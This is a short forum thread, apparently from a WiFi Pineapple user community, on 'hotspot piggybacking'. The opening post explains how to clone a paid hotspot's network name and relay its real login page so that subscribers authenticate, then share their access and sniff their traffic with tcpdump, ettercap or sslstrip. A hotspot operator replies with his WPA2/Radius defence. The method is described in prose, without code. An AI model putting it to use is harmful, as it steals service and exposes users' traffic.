thesugarat Posted April 30, 2014 Share Posted April 30, 2014 There is "normal" concept of using the Pineapple in the field which essentially looks like: wlan0 = "FreeWiFi" , wlan1 = client mode connected to "BoingoHotspot" : Under this configuration you as the pineapple owner are responsible for getting through the wlan1 "BoingoHotspot" splash page/portal first so that you are actually sharing their connection but no one on FreeWiFi knows this. But, what I like to call HotSpot Piggybacking looks something like this: wlan0 = "BoingoHotspot2", wlan1 = client mode connected to "BoingoHotspot" : With this configuration you are fishing for a legitimate BoingoHotspot user to authenticate themselves on what they believe is a legitimate Boingo AP. It looks and behaves exactly like the real thing because they are seeing the real splash page. But, once they authenticate themselves you and any other user on the Pineapple afterwards has internet. Also, you are still the MITM and can see all users traffic i.e. use tcpdump or ettercap or turn on sslstrip etc. Does anybody else use this method? I realize it can take time, but I think it's a viable alternative if you don't have free wifi around or a cell stick/hotspot to use with your pineapple. And it can work in coffee shops or airports equally well, it just requires a high turnover of users who logon to their local account with the hotspot provider. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted April 30, 2014 Share Posted April 30, 2014 I've done this a couple of times when the only open APs I could see all required a paid login. Quote Link to comment Share on other sites More sharing options...
thesugarat Posted April 30, 2014 Author Share Posted April 30, 2014 That's exactly the situation where this comes in handy... Quote Link to comment Share on other sites More sharing options...
madhak Posted April 30, 2014 Share Posted April 30, 2014 (edited) Yep. that's why I have implemented WPA2 with Radius auth for my Hotspot AP... I was getting a lot of complain about user not being able to login while our system said they were loged in and being charged for... Now they login to WPA2 as guest, purchase internet access using encrypted channel, then the portal send a WISPr message to the device which contain their personal WPA2 credential,... please hack that guy, you are the reason I have a job lol ;) Edited April 30, 2014 by madhak Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.